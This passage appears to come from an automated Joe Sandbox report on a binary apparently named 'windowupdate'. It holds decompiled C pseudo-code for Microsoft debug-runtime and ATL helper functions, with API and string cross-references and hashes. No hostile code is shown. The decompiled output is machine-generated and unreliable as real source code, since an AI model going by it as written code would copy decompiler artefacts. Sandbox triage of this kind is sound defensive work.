                        • Part of subcall function 00DC24B0: GetModuleFileNameW.KERNEL32(00D3241C,?,00DC2111,?,00DC2111,?,00D3241C,00DC1975), ref: 00DC24BF
                        • Part of subcall function 00DC2000: __aligned_msize.LIBCMTD ref: 00DC205F
                        • Part of subcall function 00DC2000: __aligned_msize.LIBCMTD ref: 00DC2079
                        • Part of subcall function 00DC2000: __CrtDbgReportWV.LIBCMTD ref: 00DC20A2
                        • Part of subcall function 00DC24E0: LoadLibraryExW.KERNEL32(?,?,00000800,?,00DC1DC7,api-ms-win-core-registry-l1-1-0.dll,00000000,00000800,?,?,00000000), ref: 00DC24EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressErrorLastProc$LibraryModule__aligned_msize$FileFreeFromHandleInstallLoadNamePathReport
                      • String ID: MSPDB140$VCRUNTIME140D.dll
                      • API String ID: 1159430209-1916464790
                      • Opcode ID: 6d5fa9ce0c261512866bf177a1ade8efdd0e6af56c4dec0dab7067c0a3f08ffb
                      • Instruction ID: 1d9d2ee40e6179aa294262869a6135ec39354744af3d8aa5aa38d6cb936d984b
                      • Opcode Fuzzy Hash: 6d5fa9ce0c261512866bf177a1ade8efdd0e6af56c4dec0dab7067c0a3f08ffb
                      • Instruction Fuzzy Hash: D031A9F5E4031A67EB20A7606C46FA9736C9B11705F184179EE05E7183FA71DA4886B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 44%
                      			E00D334A0(void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                      				char _v8;
                      				void* _v12;
                      				char _v16;
                      				char _v20;
                      				intOrPtr* _t30;
                      				void* _t33;
                      				intOrPtr _t35;
                      				void* _t37;
                      				void* _t40;
                      				void* _t46;
                      				intOrPtr* _t55;
                      				void* _t64;
                      				void* _t65;
                      
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				do {
                      					_t30 = _a4;
                      					_t67 =  *((intOrPtr*)(_t30 + 0x10));
                      					if( *((intOrPtr*)(_t30 + 0x10)) == 0) {
                      						_t46 = L00D84930(_t67, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xfa, 0, "%ls", L"pCache != 0");
                      						_t65 = _t65 + 0x18;
                      						if(_t46 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					_t55 = 0;
                      				} while (0 != 0);
                      				_v12 = 0;
                      				if( *((intOrPtr*)(_a4 + 8)) != 0) {
                      					_t55 =  *((intOrPtr*)(_a4 + 8));
                      					_t33 =  *_t55( *((intOrPtr*)(_a4 + 0xc)), 0xdf02d4,  &_v12);
                      					__eflags = _t65 - _t65;
                      					_v20 = E00DC1520(_t33, _t65 - _t65);
                      					__eflags = _v20;
                      					if(_v20 >= 0) {
                      						_t55 = _a4;
                      						__imp__CoRegisterClassObject( *_t55, _v12, _a8, _a12,  *((intOrPtr*)(_a4 + 0x10)) + 4);
                      						__eflags = _t65 - _t65;
                      						_v20 = E00DC1520( *_t55, _t65 - _t65);
                      					}
                      					__eflags = _v12;
                      					if(_v12 != 0) {
                      						_t55 =  *_v12;
                      						_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8))))(_v12);
                      						__eflags = _t65 - _t65;
                      						E00DC1520(_t40, _t65 - _t65);
                      					}
                      					_t35 = _v20;
                      				} else {
                      					_t35 = 0;
                      				}
                      				_push(_t55);
                      				E00DC14C0(_t64, 0xd3359c);
                      				_t37 = _t35;
                      				return E00DC1520(_t37, _t64 - _t65 + 0x10);
                      			}

















                      APIs
                      • CoRegisterClassObject.OLE32(?,00000000,?,00000000,?), ref: 00D33547
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D33581
                      Strings
                      • pCache != 0, xrefs: 00D334C1
                      • %ls, xrefs: 00D334C6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D334D2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckClassObjectRegisterStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1978586063-3984120347
                      • Opcode ID: d57634ea2333fbaf42f66c59e341ddaa320afbbcc49111ceb3a383f46c55fdc5
                      • Instruction ID: 16689fb1547c46e9013afa8bb22f4a9884ececf2d2eba9296aac52d6b617e6a6
                      • Opcode Fuzzy Hash: d57634ea2333fbaf42f66c59e341ddaa320afbbcc49111ceb3a383f46c55fdc5
                      • Instruction Fuzzy Hash: D7314175A00219AFDB14EF98D885FAEB7B5EB48354F148658F4099B252E770DE80CBF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D80A50(intOrPtr _a4) {
                      				signed int _v8;
                      				char _v12;
                      				signed char _v16;
                      				signed char _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed char _t34;
                      				void* _t40;
                      				signed int _t42;
                      				signed int _t60;
                      				void* _t61;
                      
                      				E00D66E20( &_v12, _a4);
                      				_t34 = E00D69640( &_v12);
                      				_t50 = _t34 & 0x000000ff;
                      				if((_t34 & 0x000000ff) != 0) {
                      					L12:
                      					_v24 = 1;
                      					L13:
                      					_v28 = _v24;
                      					_t70 = _v28;
                      					if(_v28 == 0) {
                      						_t40 = L00D84930(_t70, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0, L"%ls", L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))");
                      						_t61 = _t61 + 0x18;
                      						if(_t40 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_v28 != 0) {
                      						return 1;
                      					} else {
                      						 *((intOrPtr*)(L00D82F70(_t50))) = 0x16;
                      						E00D82900(L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))", L"__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0);
                      						return 0;
                      					}
                      				}
                      				_t50 =  &_v12;
                      				_t42 = E00D98780(E00D6C080( &_v12));
                      				_t61 = _t61 + 4;
                      				_v8 = _t42;
                      				if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
                      					_v16 = 0xdf61f0;
                      				} else {
                      					_t60 = _v8 >> 6;
                      					_t50 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + _t60 * 4));
                      					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + _t60 * 4));
                      				}
                      				if( *((char*)(_v16 + 0x29)) != 0) {
                      					L11:
                      					_v24 = 0;
                      					goto L13;
                      				} else {
                      					if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
                      						_v20 = 0xdf61f0;
                      					} else {
                      						_v20 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + (_v8 >> 6) * 4));
                      					}
                      					_t25 = _v20 + 0x2d; // 0x0
                      					_t50 =  *_t25 & 0x00000001;
                      					if(( *_t25 & 1) == 0) {
                      						goto L12;
                      					} else {
                      						goto L11;
                      					}
                      				}
                      			}















                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D80A5F
                        • Part of subcall function 00D98780: std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      Strings
                      • ( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && , xrefs: 00D80B1C, 00D80B64
                      • __acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required, xrefs: 00D80B5F
                      • %ls, xrefs: 00D80B21
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio.h, xrefs: 00D80B2D, 00D80B5A
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                      • API String ID: 4219598475-3476576762
                      • Opcode ID: 2a47680dacc34165bed36adacbfd16507b8ac2439ff406087872d3118eb16c7b
                      • Instruction ID: 9ce95cd5c78d6350c5979ac85cb8a796c8eb1f5b9b99c2c0e2d7813a0abb1b50
                      • Opcode Fuzzy Hash: 2a47680dacc34165bed36adacbfd16507b8ac2439ff406087872d3118eb16c7b
                      • Instruction Fuzzy Hash: 2931A5B0D01309EFCF14EF94CC56BAEBB74AB10319F244259E1116B2C2D770AA49DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00D93520(signed int _a4) {
                      				struct HINSTANCE__* _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t38;
                      				void* _t41;
                      
                      				_t44 = 0xf21098 + _a4 * 4;
                      				_v12 = E00D5AE90(0xf21098 + _a4 * 4);
                      				if(_v12 == 0) {
                      					_v8 = E00D93670(_t44,  *((intOrPtr*)(0xdd8730 + _a4 * 4)));
                      					__eflags = _v8;
                      					if(_v8 != 0) {
                      						_v20 = E00D5AE60(0xf21098 + _a4 * 4, _v8);
                      						__eflags = _v20;
                      						if(_v20 != 0) {
                      							__eflags = _v20 - _v8;
                      							if(__eflags != 0) {
                      								_t38 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xff, 0, L"%ls", L"cached_handle == new_handle");
                      								__eflags = _t38 - 1;
                      								if(_t38 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							FreeLibrary(_v8);
                      						}
                      						return _v8;
                      					}
                      					_v16 = E00D5AE70(0xf21098 + _a4 * 4, 0xffffffff);
                      					__eflags = _v16;
                      					if(_v16 != 0) {
                      						__eflags = _v16 - 0xffffffff;
                      						if(__eflags != 0) {
                      							_t41 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xf3, 0, L"%ls", L"cached_handle == INVALID_HANDLE_VALUE");
                      							__eflags = _t41 - 1;
                      							if(_t41 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					}
                      					return 0;
                      				}
                      				if(_v12 == 0xffffffff) {
                      					return 0;
                      				}
                      				return _v12;
                      			}










                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                      • API String ID: 0-442401637
                      • Opcode ID: 2431f676a62e38af8f0f54e64c8f8945c3379dd7cbe7ea572ff9ba028975dd3e
                      • Instruction ID: 3da4b5beaa0a87444de0c906d3e257a56c24e521c932220a94465386548799df
                      • Opcode Fuzzy Hash: 2431f676a62e38af8f0f54e64c8f8945c3379dd7cbe7ea572ff9ba028975dd3e
                      • Instruction Fuzzy Hash: 60218F70E0020AFBCF20EBA8DC5AF6D7774AB04714F284A55F815A72C1E670AB49DB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00D31BB0(void* __ecx, void* __esi, char* _a4, short* _a8, int _a12, int _a16) {
                      				intOrPtr _v8;
                      				char* _t14;
                      				int _t18;
                      				void* _t20;
                      				void* _t21;
                      				void* _t22;
                      				void* _t31;
                      				void* _t32;
                      
                      				_v8 = 0xcccccccc;
                      				_t34 = _a8;
                      				if(_a8 == 0) {
                      					_t22 = L00D84930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24d, 0, "%ls", L"lpw != 0");
                      					_t32 = _t32 + 0x18;
                      					if(_t22 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t36 = _a4;
                      				if(_a4 == 0) {
                      					_t21 = L00D84930(_t36, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24e, 0, "%ls", L"lpa != 0");
                      					_t32 = _t32 + 0x18;
                      					if(_t21 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 == 0 || _a8 == 0) {
                      					_t14 = 0;
                      				} else {
                      					 *_a4 = 0;
                      					_t18 = WideCharToMultiByte(_a16, 0, _a8, 0xffffffff, _a4, _a12, 0, 0);
                      					__eflags = _t32 - _t32;
                      					_v8 = E00DC1520(_t18, _t32 - _t32);
                      					__eflags = _v8;
                      					if(__eflags != 0) {
                      						_t14 = _a4;
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t20 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x258, 0, "%ls", 0xde40dc);
                      							_t32 = _t32 + 0x18;
                      							__eflags = _t20 - 1;
                      							if(__eflags == 0) {
                      								asm("int3");
                      							}
                      						}
                      						_t14 = 0;
                      					}
                      				}
                      				return E00DC1520(_t14, _t31 - _t32 + 4);
                      			}












                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00D31C44
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: abdec87be69ad4f71221d1363bcf364e47234f904bb9c075aec6eafde307f9b9
                      • Instruction ID: 7800c322c868e1c1214e83fa87cc62317bfd8762877a7093b05cf0512ae766fe
                      • Opcode Fuzzy Hash: abdec87be69ad4f71221d1363bcf364e47234f904bb9c075aec6eafde307f9b9
                      • Instruction Fuzzy Hash: 73213534EC035ABFDF20BA54DC47FAA73649B10B51F249118FA156A1C2E2F1D9908BF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 60%
                      			E00D33E80(intOrPtr __ecx, void* __esi, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* _t23;
                      				intOrPtr _t24;
                      				void* _t30;
                      				void* _t32;
                      				intOrPtr _t35;
                      				void* _t48;
                      				void* _t49;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t51 = _a4;
                      				if(_a4 == 0) {
                      					_t23 = L00D84930(_t51, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc25, 0, "%ls", L"ppGIT != 0");
                      					_t49 = _t49 + 0x18;
                      					if(_t23 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 != 0) {
                      					_v12 = 0;
                      					_t35 = _v8;
                      					__eflags =  *((intOrPtr*)(_t35 + 0x28));
                      					if( *((intOrPtr*)(_t35 + 0x28)) == 0) {
                      						__imp__CoCreateInstance(0xdc65d0, 0, 1, 0xdf0548, _v8 + 0x28);
                      						__eflags = _t49 - _t49;
                      						_v12 = E00DC1520(_t23, _t49 - _t49);
                      					}
                      					__eflags = _v12;
                      					if(__eflags < 0) {
                      						L13:
                      						_t24 = _v12;
                      						L14:
                      						return E00DC1520(_t24, _t48 - _t49 + 8);
                      					} else {
                      						do {
                      							__eflags =  *((intOrPtr*)(_v8 + 0x28));
                      							if(__eflags == 0) {
                      								_t32 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc33, 0, "%ls", L"m_pGIT != 0");
                      								_t49 = _t49 + 0x18;
                      								__eflags = _t32 - 1;
                      								if(_t32 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = 0;
                      						} while (0 != 0);
                      						 *_a4 =  *((intOrPtr*)(_v8 + 0x28));
                      						_t30 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)))) + 4))))( *((intOrPtr*)(_v8 + 0x28)));
                      						__eflags = _t49 - _t49;
                      						E00DC1520(_t30, __eflags);
                      						goto L13;
                      					}
                      				}
                      				_t24 = 0x80004003;
                      				goto L14;
                      			}












                      APIs
                      • CoCreateInstance.OLE32(00DC65D0,00000000,00000001,00DF0548,CCCCCCA4), ref: 00D33EFB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_pGIT != 0$ppGIT != 0
                      • API String ID: 542301482-2412262283
                      • Opcode ID: 436f4aece27b66c714a9d22670c79b0039ece1ecac5b5b91ea4ad8bcaa331164
                      • Instruction ID: 07facdc664819d4a8740967349ac51f314f2d5339eaf28052ecee02da4e457c3
                      • Opcode Fuzzy Hash: 436f4aece27b66c714a9d22670c79b0039ece1ecac5b5b91ea4ad8bcaa331164
                      • Instruction Fuzzy Hash: D6219F75E40219AFDB10EB48DA82F9DB771EF54715F608298F9056B282D3B19F80CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D52BE0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v12;
                      				char _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				char* _v32;
                      				char _v36;
                      				char* _v40;
                      				char _v44;
                      				char _v52;
                      				char _t27;
                      				char* _t36;
                      				char _t38;
                      				intOrPtr* _t40;
                      				char* _t47;
                      				intOrPtr _t57;
                      				char* _t58;
                      				intOrPtr _t59;
                      				void* _t62;
                      				void* _t63;
                      
                      				_t57 = __edx;
                      				_t27 = E00D50130(__ecx, 0);
                      				_t63 = _t62 + 4;
                      				_v28 = _t27;
                      				_v24 = _t57;
                      				E00D4F1F0( &_v20,  &_v28);
                      				_t47 =  *0xf20640; // 0x0
                      				_t58 =  *_t47;
                      				if(_t58 == 0) {
                      					E00D4FF10( &_v20, 1);
                      					L10:
                      					_v44 = E00D50060(") ", 2);
                      					_v40 = _t58;
                      					E00D4FCA0( &_v20,  &_v44);
                      					E00D4F240(_a4,  &_v20);
                      					return _a4;
                      				}
                      				_t36 =  *0xf20640; // 0x0
                      				_v12 =  *_t36;
                      				_t59 =  *0xf20640; // 0x0
                      				_t58 = _t59 + 1;
                      				 *0xf20640 = _t58;
                      				_v8 = _v12;
                      				if(_v8 == 0x30) {
                      					_t38 = E00D50060("void", 4);
                      					_t63 = _t63 + 8;
                      					_v36 = _t38;
                      					_v32 = _t58;
                      					E00D4FCA0( &_v20,  &_v36);
                      					L8:
                      					goto L10;
                      				}
                      				if(_v8 == 0x32) {
                      					_t58 =  &_v52;
                      					_t40 = E00D57B30(__ebx, __edi, __esi, __eflags, _t58);
                      					_t63 = _t63 + 4;
                      					E00D4FD40( &_v20, _t40);
                      					goto L8;
                      				}
                      				if(_v8 == 0x35) {
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				goto L8;
                      			}























                      APIs
                        • Part of subcall function 00D50130: UnDecorator::doUnderScore.LIBCMTD ref: 00D50136
                      • DName::DName.LIBVCRUNTIMED ref: 00D52C82
                      • DName::operator+=.LIBCMTD ref: 00D52C93
                      • Mailbox.LIBCMTD ref: 00D52CC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
                      • String ID: 5$void
                      • API String ID: 3298578019-571193483
                      • Opcode ID: 2d7199fe1684af96787b14d100592e8884565f5ead2776e9b107dc5510b87ceb
                      • Instruction ID: 85158473d030745bc305a46816cf52f51e849a0e9d34ac80f10fac9374c270ec
                      • Opcode Fuzzy Hash: 2d7199fe1684af96787b14d100592e8884565f5ead2776e9b107dc5510b87ceb
                      • Instruction Fuzzy Hash: 85212CB19002199BCF18EF94D892AFEBB74FF45301F144169ED1667292DA306A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00DC2000(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed int _v8;
                      				char _v16;
                      				char _v528;
                      				char _v1040;
                      				char _v1552;
                      				void* __esi;
                      				signed int _t17;
                      				signed int _t31;
                      				void* _t44;
                      				intOrPtr _t46;
                      				signed int _t47;
                      
                      				_t45 = __edi;
                      				_t35 = __ebx;
                      				_t17 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t17 ^ _t47;
                      				_t46 = _a8;
                      				if(E00DC4BA0(_a4,  &_v16, 3,  &_v1552, 0x100,  &_v1040, 0x100,  &_v528, 0x100) != 0 || E00D82600( &_v1040, 9, L"MSPDB140") != 0 || E00D82600( &_v528, 4, L"DLL") != 0) {
                      					return E00D47280(0, _t35, _v8 ^ _t47, _t44, _t45, _t46);
                      				} else {
                      					_t31 = E00DC2ED0(_t46, _a12,  &_v16,  &_v1552,  &_v1040,  &_v528);
                      					asm("sbb eax, eax");
                      					return E00D47280( ~_t31 + 1, __ebx, _v8 ^ _t47, _t44, __edi, _t46);
                      				}
                      			}














                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
